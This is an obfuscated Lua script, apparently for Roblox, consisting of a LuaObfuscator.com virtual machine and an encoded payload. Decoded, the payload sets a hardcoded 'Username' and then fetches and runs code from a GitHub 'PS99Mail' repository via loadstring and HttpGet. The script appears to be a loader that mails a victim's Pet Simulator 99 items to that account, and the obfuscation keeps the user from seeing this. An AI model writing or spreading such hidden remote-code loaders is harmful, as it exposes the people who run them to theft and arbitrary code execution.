--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v31)if (v1(v31,2)==79) then local v83=0;while true do if (v83==0) then v20=v0(v3(v31,1,1));return "";end end else local v84=v2(v0(v31,16));if v20 then local v94=0;local v95;while true do if (1==v94) then return v95;end if (v94==0) then v95=v5(v84,v20);v20=nil;v94=1;end end else return v84;end end end);v21=nil;v18=1;end if (v18==2) then function v23()local v32=0 -0 ;local v33;local v34;while true do if (v32==1) then return (v34 * (732 -476)) + v33 ;end if (v32==(0 -0)) then v33,v34=v1(v16,v19,v19 + (4 -2) );v19=v19 + (621 -(555 + 64)) ;v32=932 -(857 + 74) ;end end end v24=nil;function v24()local v35,v36,v37,v38=v1(v16,v19,v19 + (571 -(367 + 201)) );v19=v19 + (931 -(214 + 713)) ;return (v38 * (4199571 + 12577645)) + (v37 * ((11944 -(1523 + 114)) + 55229)) + (v36 * ((1019 + 114) -(282 + 595))) + v35 ;end v25=nil;v18=3;end if (3==v18) then function v25()local v39=0 -0 ;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v39==(1068 -(68 + 174 + 823))) then if (v44==(1270 -(226 + 1044))) then if (v43==(0 -0)) then return v45 * ((207 -90) -(32 + 85)) ;else local v108=0 + 0 ;while true do if (v108==0) then v44=1 + 0 ;v42=0;break;end end end elseif (v44==(3004 -(892 + 65))) then return ((v43==(0 -0)) and (v45 * ((1 -(0 + 0))/(0 -0)))) or (v45 * NaN) ;end return v8(v45,v44-(1373 -(87 + 263)) ) * (v42 + (v43/((182 -(67 + 113))^(39 + 13)))) ;end if (v39==(0 -0)) then v40=v24();v41=v24();v39=1 + 0 ;end if (v39==(7 -5)) then v44=v21(v41,21,983 -(802 + 150) );v45=((v21(v41,85 -(844 -(368 + 423)) )==(1 -(0 -0))) and  -(1 + 0)) or (998 -(915 + 82)) ;v39=8 -5 ;end if (v39==(1 + 0)) then v42=1 -0 ;v43=(v21(v41,1,1207 -(1069 + 118) ) * ((4 -2)^(50 -(10 + 8)))) + v40 ;v39=(11 -8) -1 ;end end end v26=nil;function v26(v46)local v47=0;local v48;local v49;while true do if (v47==(445 -(416 + 26))) then return v6(v49);end if (v47==(6 -4)) then v49={};for v96=1 + 0 , #v48 do v49[v96]=v2(v1(v3(v48,v96,v96)));end v47=4 -(773 -(201 + 571)) ;end if (v47==0) then v48=nil;if  not v46 then local v102=438 -(145 + (1431 -(116 + 1022))) ;while true do if (v102==(430 -(44 + 386))) then v46=v24();if (v46==0) then return "";end break;end end end v47=(6190 -4703) -(998 + 488) ;end if (v47==(1 + 0)) then v48=v3(v16,v19,(v19 + v46) -(1 + 0) );v19=v19 + v46 ;v47=2;end end end v27=v24;v18=4;end if (5==v18) then v30=nil;function v30(v50,v51,v52)local v53=v50[1];local v54=v50[2];local v55=v50[3];return function(...)local v69=v53;local v70=v54;local v71=v55;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v85=0,v77 do if (v85>=v71) then v75[v85-v71 ]=v76[v85 + 1 ];else v79[v85]=v76[v85 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=10) then if (v82<=4) then if (v82<=1) then if (v82>0) then local v109=v81[2];v79[v109]=v79[v109](v13(v79,v109 + 1 ,v74));else for v119=v81[2],v81[3] do v79[v119]=nil;end end elseif (v82<=2) then for v121=v81[2],v81[3] do v79[v121]=nil;end elseif (v82>3) then v52[v81[3]]=v79[v81[2]];else v73=v81[3];end elseif (v82<=7) then if (v82<=5) then do return;end elseif (v82>6) then local v128=0;local v129;local v130;while true do if (v128==0) then v129=v81[2];v130=v79[v81[3]];v128=1;end if (1==v128) then v79[v129 + 1 ]=v130;v79[v129]=v130[v81[4]];break;end end else v79[v81[2]]();end elseif (v82<=8) then v79[v81[2]]=v81[3];elseif (v82>9) then v73=v81[3];else v79[v81[2]]=v81[3];end elseif (v82<=15) then if (v82<=12) then if (v82==11) then if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v52;else v79[v81[2]]=v52[v81[3]];end elseif ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v52;else v79[v81[2]]=v52[v81[3]];end elseif (v82<=13) then v52[v81[3]]=v79[v81[2]];elseif (v82==14) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else do return;end end elseif (v82<=18) then if (v82<=16) then v79[v81[2]]();elseif (v82>17) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else local v140=0;local v141;local v142;local v143;local v144;while true do if (v140==0) then v141=v81[2];v142,v143=v72(v79[v141](v13(v79,v141 + 1 ,v81[3])));v140=1;end if (v140==1) then v74=(v143 + v141) -1 ;v144=0;v140=2;end if (v140==2) then for v181=v141,v74 do v144=v144 + 1 ;v79[v181]=v142[v144];end break;end end end elseif (v82<=19) then local v115=v81[2];local v116,v117=v72(v79[v115](v13(v79,v115 + 1 ,v81[3])));v74=(v117 + v115) -1 ;local v118=0;for v123=v115,v74 do local v124=0;while true do if (v124==0) then v118=v118 + 1 ;v79[v123]=v116[v118];break;end end end elseif (v82==20) then local v145=0;local v146;while true do if (v145==0) then v146=v81[2];v79[v146]=v79[v146](v13(v79,v146 + 1 ,v74));break;end end else local v147=0;local v148;local v149;while true do if (v147==0) then v148=v81[2];v149=v79[v81[3]];v147=1;end if (v147==1) then v79[v148 + 1 ]=v149;v79[v148]=v149[v81[4]];break;end end end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then function v21(v56,v57,v58)if v58 then local v88=(v56/((3 -1)^(v57-(1081 -(1020 + 60)))))%((1425 -(630 + 793))^(((v58-(1 + 0)) -(v57-1)) + (3 -2))) ;return v88-(v88%(3 -2)) ;else local v89=859 -((2727 -(1789 + 124)) + 45) ;local v90;while true do if (v89==0) then v90=(4 -(768 -(745 + 21)))^(v57-(1 + 0)) ;return (((v56%(v90 + v90))>=v90) and (1 + 0)) or (885 -(261 + 624)) ;end end end end v22=nil;function v22()local v59=0;local v60;while true do if ((1 + 0)==v59) then return v60;end if (v59==0) then v60=v1(v16,v19,v19);v19=v19 + (2 -1) ;v59=3 -2 ;end end end v23=nil;v18=2;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v61=0;local v62;local v63;local v64;local v65;local v66;local v67;local v68;while true do if (v61==(1 + 0)) then local v91=166 -(9 + 157) ;while true do if (v91==(3 -2)) then v61=1826 -(1195 + 629) ;break;end if (v91==0) then v64=nil;v65=nil;v91=1 -0 ;end end end if (v61~=(241 -(187 + 54))) then else local v92=780 -(162 + 618) ;while true do if (0~=v92) then else v62=0 + 0 ;v63=nil;v92=1 + 0 ;end if (1==v92) then v61=1;break;end end end if (v61~=(3 -1)) then else local v93=0;while true do if (v93~=0) then else v66=nil;v67=nil;v93=983 -(18 + 964) ;end if (v93==1) then v61=4 -1 ;break;end end end if (3==v61) then v68=nil;while true do if (v62~=(0 + 0)) then else local v103=0 + 0 ;while true do if (v103==(1638 -(1373 + 263))) then v62=1001 -(451 + 549) ;break;end if (v103~=(0 + 0)) then else v63={};v64={};v103=851 -(20 + 830) ;end if (v103~=(1 + 0)) then else v65={};v66={v63,v64,nil,v65};v103=1 + 1 ;end end end if (v62==(127 -(116 + 10))) then local v104=0 -0 ;local v105;while true do if (v104~=(341 -(218 + 123))) then else v105=1581 -(1535 + 46) ;while true do if ((2 + 0)~=v105) then else v62=1 + 1 ;break;end if ((1 + 0)==v105) then for v152=1 + 0 ,v67 do local v153=0;local v154;local v155;local v156;while true do if (v153==(561 -(306 + 254))) then v156=nil;while true do if (v154==(1 + 0)) then if (v155==(1 -0)) then v156=v22()~=(1467 -(899 + 568)) ;elseif (v155==2) then v156=v25();elseif (v155~=(7 -4)) then else v156=v26();end v68[v152]=v156;break;end if ((1551 -(1126 + 425))==v154) then v155=v22();v156=nil;v154=1;end end break;end if ((0 + 0)==v153) then v154=0 -0 ;v155=nil;v153=1;end end end v66[7 -4 ]=v22();v105=2;end if (v105==(603 -(268 + 335))) then local v151=1121 -(118 + 1003) ;while true do if (v151==(291 -(60 + 230))) then v105=1;break;end if (v151==(572 -(426 + 146))) then v67=v24();v68={};v151=1 + 0 ;end end end end break;end end end if (v62~=(5 -3)) then else local v106=377 -(142 + 235) ;local v107;while true do if (v106~=(1456 -(282 + 1174))) then else v107=0;while true do if (v107~=(1 + 0)) then else return v66;end if (v107==(811 -(569 + 242))) then for v157=2 -1 ,v24() do local v158=977 -(553 + 424) ;local v159;local v160;local v161;while true do if ((1 + 0)==v158) then v161=nil;while true do if (v159==(0 + 0)) then v160=0;v161=nil;v159=1025 -(706 + 318) ;end if (v159~=1) then else while true do if (v160==0) then v161=v22();if (v21(v161,1 + 0 ,1252 -(721 + 530) )~=(1271 -(945 + 326))) then else local v185=0;local v186;local v187;local v188;local v189;while true do if (v185~=(2 + 0)) then else while true do if (v186~=(2 -1)) then else local v191=0;while true do if (v191==(2 -1)) then v186=4 -2 ;break;end if (v191==(0 -0)) then local v199=0 + 0 ;while true do if (v199==1) then v191=1;break;end if (v199~=(0 + 0)) then else local v200=0;while true do if (v200~=(701 -(271 + 429))) then else v199=1 + 0 ;break;end if (v200==0) then v189={v23(),v23(),nil,nil};if (v187==(0 + 0)) then local v202=0;local v203;local v204;while true do if (v202==0) then v203=0 + 0 ;v204=nil;v202=1172 -(418 + 753) ;end if ((2 -1)~=v202) then else while true do if (v203==(1202 -(373 + 829))) then v204=731 -(476 + 255) ;while true do if (v204==(0 + 0)) then v189[1 + 2 ]=v23();v189[2 + 2 ]=v23();break;end end break;end end break;end end elseif (v187==(1 -0)) then v189[3]=v24();elseif (v187==(1 + 1)) then v189[3]=v24() -((531 -(406 + 123))^(1785 -(1749 + 20))) ;elseif (v187~=3) then else local v211=0;local v212;local v213;while true do if (v211==(1 + 0)) then while true do if ((1322 -(1249 + 73))==v212) then v213=0 + 0 ;while true do if (v213~=0) then else v189[1148 -(466 + 679) ]=v24() -((1 + 1)^16) ;v189[9 -5 ]=v23();break;end end break;end end break;end if (v211~=(0 -0)) then else v212=0;v213=nil;v211=1901 -(106 + 1794) ;end end end v200=1 + 0 ;end end end end end end end if (0==v186) then local v192=0;local v193;while true do if ((0 + 0)==v192) then v193=0;while true do if (v193==(1 + 0)) then v186=2 -1 ;break;end if (v193~=0) then else v187=v21(v161,2,2 + 1 );v188=v21(v161,10 -6 ,6);v193=115 -(4 + 110) ;end end break;end end end if (v186~=(586 -(57 + 527))) then else local v194=1427 -(41 + 1386) ;local v195;while true do if (v194~=0) then else v195=0 + 0 ;while true do if (v195~=(104 -(17 + 86))) then else v186=2 + 1 ;break;end if (v195~=(0 + 0)) then else local v201=0;while true do if (1==v201) then v195=1 -0 ;break;end if (v201~=(0 -0)) then else if (v21(v188,167 -(122 + 44) ,1)==1) then v189[2 -0 ]=v68[v189[2]];end if (v21(v188,2 + 0 ,2)==(857 -(564 + 292))) then v189[3]=v68[v189[3]];end v201=1;end end end end break;end end end if (v186~=3) then else if (v21(v188,5 -2 ,9 -6 )==(1 + 0)) then v189[1 + 3 ]=v68[v189[4]];end v63[v157]=v189;break;end end break;end if (v185~=(1 -0)) then else local v190=0 + 0 ;while true do if (v190==(476 -(41 + 435))) then v188=nil;v189=nil;v190=1;end if ((1002 -(938 + 63))==v190) then v185=67 -(30 + 35) ;break;end end end if (v185==(0 + 0)) then v186=0;v187=nil;v185=1126 -(936 + 189) ;end end end break;end end break;end end break;end if (v158==(1257 -(1043 + 214))) then v159=0 -0 ;v160=nil;v158=1213 -(323 + 889) ;end end end for v162=1,v24() do v64[v162-(2 -1) ]=v29();end v107=1;end end break;end end end end break;end end end v18=5;end end end v15("LOL!073O00028O0003083O00557365726E616D65030D3O006D6F68616D6564746168616568030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012083O00014O0002000100013O00260E3O0002000100010004033O00020001001208000100013O00260E00010005000100010004033O00050001001208000200033O00120D000200023O00120C000200043O00120C000300053O002007000300030006001208000500074O0013000300054O001400023O00022O00100002000100010004033O001400010004033O000500010004033O001400010004033O000200012O000F3O00017O00",v9(),...);
